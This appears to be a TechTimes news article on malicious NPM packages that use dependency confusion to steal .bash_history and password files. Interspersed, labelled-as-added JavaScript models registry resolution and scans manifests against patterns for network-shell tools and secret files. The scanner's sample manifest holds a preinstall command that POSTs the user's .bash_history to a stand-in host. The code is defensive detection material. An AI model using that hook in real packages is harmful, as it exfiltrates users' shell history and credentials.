Security researchers have discovered new malicious NPM packages that target code used by Amazon, Slack, Zillow, and Lyft. The packages reportedly steal Linux and Unix password files, and the researchers say they can also open reverse shells back to the attackers.
According to Bleeping Computer's latest report, the packages abuse dependency confusion, a technique first disclosed by security researcher Alex Birsan, who earned bug bounties from 35 companies by demonstrating it. The weakness is not in any one product but in how open-source development tools resolve package names.
Sonatype, a software supply-chain security firm, said the NPM packages carry malicious code that exploits dependency confusion, and that their names match components used internally by companies such as Amazon, Slack, Lyft, and Zillow.
How the new NPM packages attack
The malicious NPM packages are named amzn, zg-rentals, lyft-dataset-sdk, and serverless-slack-app. Dependency confusion works because package managers that pull from both a private feed and a public registry (NPM, PyPI, RubyGems) will, for a name that exists in both, fetch the public copy rather than the company's internal package when building the application, typically because the public copy carries a higher version number.
Security researchers also explained that dependency confusion lets an attacker inject their own code into a company's internal application, which makes it a supply-chain attack.
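The resolution behaviour described in the two paragraphs above, as an added example that is not code from the article, Sonatype, or any of the named companies. It models a merged package feed (internal registry plus public registry), shows why a same-named public package with a higher version wins, and audits a package.json dependency map for names that would be served from the public side. The registry contents, the `@acme` scope, and the `scopeRegistries` config shape are constructed assumptions; real package managers and proxies differ in detail.

```javascript
// Added example, not code from the article, Sonatype or any of the named companies.
// Models how a merged package feed (internal registry + public registry) resolves a
// name, and why a same-named public package with a higher version wins.
// Registry contents and config are constructed sample data.

// Compare two "MAJOR.MINOR.PATCH" strings; positive if a > b. Prerelease tags are not handled.
function compareSemver(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Constructed feeds: package name -> published versions.
const INTERNAL_REGISTRY = {
  'amzn': ['1.2.0'],            // a private component that was never meant to be public
  '@acme/amzn': ['1.2.0'],      // the same component republished under a reserved scope
};
const PUBLIC_REGISTRY = {
  'amzn': ['1.99.0'],           // attacker-published squat: higher than 1.2.0 and still inside ^1.0.0
  'lodash': ['4.17.21'],
};

// Resolve a dependency name against both feeds.
// config.scopeRegistries maps a scope such as '@acme' to 'internal'; names under such
// a scope are only looked up internally. Every other name is looked up in both feeds
// and the highest version wins, which is exactly the dependency-confusion condition.
function resolve(name, config) {
  const scope = name.startsWith('@') ? name.split('/')[0] : null;
  const candidates = (INTERNAL_REGISTRY[name] || []).map(v => ({ version: v, source: 'internal' }));
  const pinnedToInternal = scope !== null && config.scopeRegistries[scope] === 'internal';
  if (!pinnedToInternal) {
    for (const v of PUBLIC_REGISTRY[name] || []) candidates.push({ version: v, source: 'public' });
  }
  if (candidates.length === 0) return null;
  candidates.sort((x, y) => compareSemver(y.version, x.version)); // highest version first
  return candidates[0];
}

// Audit a package.json dependency map: report every dependency that the internal feed
// publishes but which would currently be served from the public registry.
// Version ranges are ignored here; the constructed squat satisfies them anyway.
function auditDependencies(dependencies, config) {
  const findings = [];
  for (const name of Object.keys(dependencies)) {
    if (!(name in INTERNAL_REGISTRY)) continue;
    const pick = resolve(name, config);
    if (pick !== null && pick.source === 'public') findings.push(name);
  }
  return findings;
}

// Stand-alone run: the unscoped name is hijacked, the scoped name is not.
const NO_SCOPE_RULES = { scopeRegistries: {} };
const SCOPE_RULES = { scopeRegistries: { '@acme': 'internal' } };
console.log(resolve('amzn', NO_SCOPE_RULES));     // { version: '1.99.0', source: 'public' }
console.log(resolve('@acme/amzn', SCOPE_RULES));  // { version: '1.2.0', source: 'internal' }
console.log(auditDependencies({ amzn: '^1.0.0', lodash: '^4.0.0' }, NO_SCOPE_RULES)); // [ 'amzn' ]
```

The fix the model illustrates is the one Birsan's research pointed at: reserve a scope (or the bare names) on the public registry and bind that scope to the internal registry in the client configuration, so the public feed is never consulted for those names.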
“I was starting to wonder when we were going to see a malicious actor take advantage of the current situation. Finally, we’ve spotted one,” said Juan Aguirre, a Sonatype security researcher, via Bleeping Computer.
“There is no scenario I can imagine where I’m going to submit a PoC for a bug bounty program that actually harms the organization. Taking their /etc/shadow file is definitely harmful,” he added.
Malicious NPM packages' main target
Security experts said the packages' main target is the ".bash_history" file in the Linux user's home directory. Once obtained, the file is sent to a remote host under the attackers' control. It is valuable because it records every command typed in the shell, including any passwords passed as command-line arguments or typed in plain text.
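A check a practitioner would want for the behaviour described above, as an added example that is not code from the article or Sonatype: scan a package's manifest for install-time lifecycle hooks that read the files named in the article (.bash_history, /etc/shadow) or use network primitives, since that is how an install hook would exfiltrate them or open a reverse shell. The manifests are constructed samples; the "amzn" one mimics the described behaviour and is not the real package, and 203.0.113.5 is a documentation-only address.

```javascript
// Added example, not code from the article or Sonatype: flag npm packages whose
// install-time lifecycle scripts touch sensitive files or reach out to the network.
// All manifests below are constructed samples, not the real packages.

// npm runs these hooks automatically during `npm install`, before anyone reviews the code.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicator patterns: sensitive local files first, then network / reverse-shell primitives.
const INDICATORS = [
  { kind: 'sensitive-file', re: /\.bash_history\b/ },
  { kind: 'sensitive-file', re: /\/etc\/shadow\b/ },
  { kind: 'sensitive-file', re: /\/etc\/passwd\b/ },
  { kind: 'sensitive-file', re: /\.ssh\// },
  { kind: 'network', re: /\b(curl|wget)\b/ },
  { kind: 'network', re: /\b(nc|ncat|netcat)\b/ },
  { kind: 'network', re: /\/dev\/tcp\// },
  { kind: 'network', re: /\bbash\s+-i\b/ },
];

// Return one finding per suspicious lifecycle hook in a package.json object.
function scanManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const reasons = INDICATORS
      .filter(ind => ind.re.test(command))
      .map(ind => `${ind.kind}:${ind.re.source}`);
    if (reasons.length > 0) findings.push({ hook, command, reasons });
  }
  return findings;
}

// 'exfiltration' when one hook both reads a sensitive file and talks to the network,
// 'suspicious' when any hook matches at least one indicator, otherwise 'clean'.
function verdict(manifest) {
  let worst = 'clean';
  for (const f of scanManifest(manifest)) {
    const hasFile = f.reasons.some(r => r.startsWith('sensitive-file:'));
    const hasNet = f.reasons.some(r => r.startsWith('network:'));
    if (hasFile && hasNet) return 'exfiltration';
    worst = 'suspicious';
  }
  return worst;
}

// Constructed sample manifests (203.0.113.0/24 is reserved for documentation).
const SQUATTED_MANIFEST = {
  name: 'amzn',
  version: '1.99.0',
  scripts: {
    preinstall: 'curl -s -X POST --data-binary @$HOME/.bash_history http://203.0.113.5/collect',
    test: 'echo ok',
  },
};
const BENIGN_MANIFEST = {
  name: 'left-pad',
  version: '1.3.0',
  scripts: { postinstall: 'node scripts/build.js', test: 'node test.js' },
};

// Stand-alone run.
console.log(verdict(SQUATTED_MANIFEST), scanManifest(SQUATTED_MANIFEST)); // exfiltration [ { hook: 'preinstall', ... } ]
console.log(verdict(BENIGN_MANIFEST));                                     // clean
```

This is a coarse indicator scan, not a sandbox: a hook that downloads and executes a second stage, or one that hides its commands in a required JavaScript file instead of the `scripts` block, will only show up as `suspicious` or not at all. Running `npm install --ignore-scripts` in CI and reviewing flagged packages by hand closes that gap.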
This article is owned by TechTimes.
Written by: Giuliano de Leon.
ⓒ 2018 TECHTIMES.com All rights reserved. Do not reproduce without permission.